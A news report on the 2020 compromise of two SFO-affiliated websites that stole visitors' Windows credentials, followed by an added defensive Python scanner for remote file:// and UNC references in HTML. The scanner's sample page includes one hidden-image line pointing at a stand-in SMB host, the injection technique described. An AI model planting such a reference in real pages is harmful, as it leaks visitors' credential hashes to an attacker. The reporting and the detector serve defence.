Two websites affiliated with San Francisco International Airport (SFO) were compromised with malicious code last March, allowing attackers to steal device login credentials from users who visited these sites, airport officials have disclosed.

The breach affected the websites SFOConnect.com, which appears to deliver informational content to the SFO workforce, and SFOConstruction.com, which includes details on airport construction projects, bids and contracts.

In an online notification posted this week, SFO says the incident may have affected individuals who specifically accessed the two websites using an Internet Explorer browser installed on either a personal Windows device or a device not maintained by SFO.

The attack is somewhat unusual because users don’t typically type in their personal device credentials when visiting a website. A more common scenario when a website breach like this occurs would be for the malicious code to steal web account credentials when registered users log in to the affected site, or steal payment card information if a user makes a purchase.

But the breach notification indicates that the attackers stole device credentials: “At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices [that accessed the compromised websites.]”

SC Media contacted SFO to confirm if it was actually device credentials and not website credentials that were stolen. Strategic Communication Advisor Francis Tsang replied, “Our statement is accurate.”

The notification also says that the malware was removed and both sites were taken offline after the breach was discovered. SFOConnect.com appears to be up and running again today, offering its visitors COVID-19 support resources. SFOConstruction.com is still under maintenance.

SFO also says that on March 23 it forced a reset for any SFO-related email and network passwords, presumably in case any victims use the same stolen credentials for email and network connectivity as well.

Colin Bastable, CEO of Lucy Security, told SC Media that while recently surveilling the dark web he found “around 8,000 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites.”

SC Media asked Bastable to speculate how the attackers might have been able to steal user device credentials when they visited the compromised site — a scenario that he thought was “unlikely” before SFO ultimately went on to confirm it. He theorized that the attack code could have generated a form field specifically asking site visitors to enter their device credentials. Alternatively, perhaps the malware embedded into the websites was able to load additional code onto the devices themselves, he added.

UPDATE 4/15: ESET has reported that the attack on the two websites relied on tactics, techniques and procedures that are typically attributed to the reputed Russian state-sponsored APT group Dragonfly, aka Energetic Bear.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” said ESET in a series of tweets. ESET researcher Matthieu Faou did tweet a note of caution, saying that “it can be another group that mimics their TTPs, we can’t be 100% sure.”
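For site owners checking their own pages for the technique ESET describes, the following is an added example, not code from the article, SFO or ESET. It scans HTML for resource references that a Windows browser would resolve over SMB (a `file://` URL with a remote host, or a UNC path). It assumes the injected reference sits in an ordinary HTML attribute; the attribute list, function names and sample page (using a documentation-range address) are constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that can make a browser fetch a resource (assumed list, extend as needed).
URL_ATTRS = {"src", "href", "data", "poster", "background", "action"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}

def remote_smb_host(url):
    """Return the remote host a file:// or UNC reference points at, else None."""
    url = url.strip()
    if url.startswith("\\\\"):                      # UNC path: \\host\share\file
        host = url[2:].replace("\\", "/").split("/", 1)[0]
    elif url[:5].lower() == "file:":
        path = url[5:].replace("\\", "/")
        slashes = len(path) - len(path.lstrip("/"))
        # file://host/... names a host; four or more slashes is a UNC form.
        # file:/path and file:///path are local files, not a network fetch.
        if slashes != 2 and slashes < 4:
            return None
        host = path.lstrip("/").split("/", 1)[0]
    else:
        return None                                 # http(s), relative, //cdn/... etc.
    host = host.lower()
    return None if host in LOCAL_HOSTS else host

class SmbRefScanner(HTMLParser):
    """Collects (line, tag, attribute, host) for every remote file/UNC reference."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = remote_smb_host(value) if name in URL_ATTRS and value else None
            if host:
                self.findings.append((self.getpos()[0], tag, name, host))

def scan_html(html):
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page; 198.51.100.7 is a documentation-range address.
SAMPLE_PAGE = """<html><body>
<img src="/images/logo.png">
<script src="//cdn.example.com/lib.js"></script>
<a href="file:///C:/docs/readme.txt">local</a>
<img src="file://198.51.100.7/share/pixel.png" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, host in scan_html(SAMPLE_PAGE):
        print(f"line {line}: <{tag} {attr}> references remote host {host}")
```

A finding on a public page is worth investigating as possible injected content, and blocking outbound SMB at the network edge limits the exposure regardless of what a page contains.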